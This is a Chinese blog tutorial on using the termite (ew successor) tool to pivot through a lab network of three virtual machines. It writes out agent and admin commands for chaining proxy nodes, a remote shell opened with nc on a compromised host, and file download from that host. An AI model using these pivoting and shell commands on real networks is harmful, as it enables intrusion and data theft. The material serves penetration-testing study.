前言

termite工具前身是ew,在复杂的内网环境他的使用很人性化。操作也是十分便捷。

程序主要分为两部分,控制端[admin]和代理端节点[agent],当代理节点链路形成之后我们就可以直接通过控制端调用任意节点,就不需要向传统的那样一级一级往下代理了。

实验环境:
termite工具在Windows和Linux都可以使用,这里为了方便只实验Windows环境。我在虚拟机中搭建了2台win8,1台win7。win8_1两块网卡一块VMnet0模式,一块使用VMnet1,win8_2两块网卡,一块VMnet1,一块VMnet2,win7一块网卡VMnet2。攻击主机使用win7,网卡为VMnet0

一、基础选项用法

工具选项用途:
-l   #指定本地socks端口,等待远程连接
-c   #指定 远程socks机器IP
-p   #指定远程socks机器端口

二、具体使用

1、建立代理节点

使用这个工具的前提是已经拿下了对应的目标机器可以进行操作。
代理端节点启动一个agent服务:

./agent -l 9999  #这里的agent需要在具体的系统中使用具体的agent
agent_Win32.exe -l 9999 #本次实验所用

#剩余的win8_2和win7也如同上面的一样,只是端口不同,我分别换成了9991和9992

在这里插入图片描述

管理端启动一个admin服务:

./admin -c 0.0.0.0 -p 9999 #对应的管理端的系统就使用具体的admin
admin_Win32.exe -c 192.168.28.76 -p 9999 #具体的PC

在这里插入图片描述

这里因为win8_2和win7,我的攻击机都无法连接,所以我需要借助我们连上的win8_1来连接 win8_2,借助win8_2来连接win7,因为他们两两相互接通的。具体方法如下:

#在前面的基础上往下走:
goto 1 #进入win8_1的控制界面
conncet 192.168.89.134 9991

在这里插入图片描述连接win7也是同理,需要借助win8_2,具体方法如下:

goto 2 #进入win8_2的控制模式
connect 192.168.75.131 9992

在这里插入图片描述
通过上述步骤我们就连通了这三台内网主机。

2、具体攻击

1、与nc联动,加入我们要获取shell,需要来借助nc工具,具体使用如下:

#termite工具操作:
goto 2 #想获取2号机的shell控制端
shell 8888 #nc需要连接的端口

#nc工具操作:
nc.exe 127.0.0.1 8888

在这里插入图片描述在这里插入图片描述

2、将远程文件下载到本地

goto 1
downfile 1.txt 2.txt #下载1.txt并重命名为2.txt

在这里插入图片描述

它还有上传 文件这些功能,这里就不一一介绍了,这里给一个官方用法链接:官方用法链接
工具下载链接:termite工具下载

总结

该工具在内网渗透中觉得还是有记录价值,因为它这种管理起来十分便利,我要使用那一台主机直接goto就好了。上述记录有错误的地方欢迎各位大佬批评指正。如有侵权请联系我

Logo

更多推荐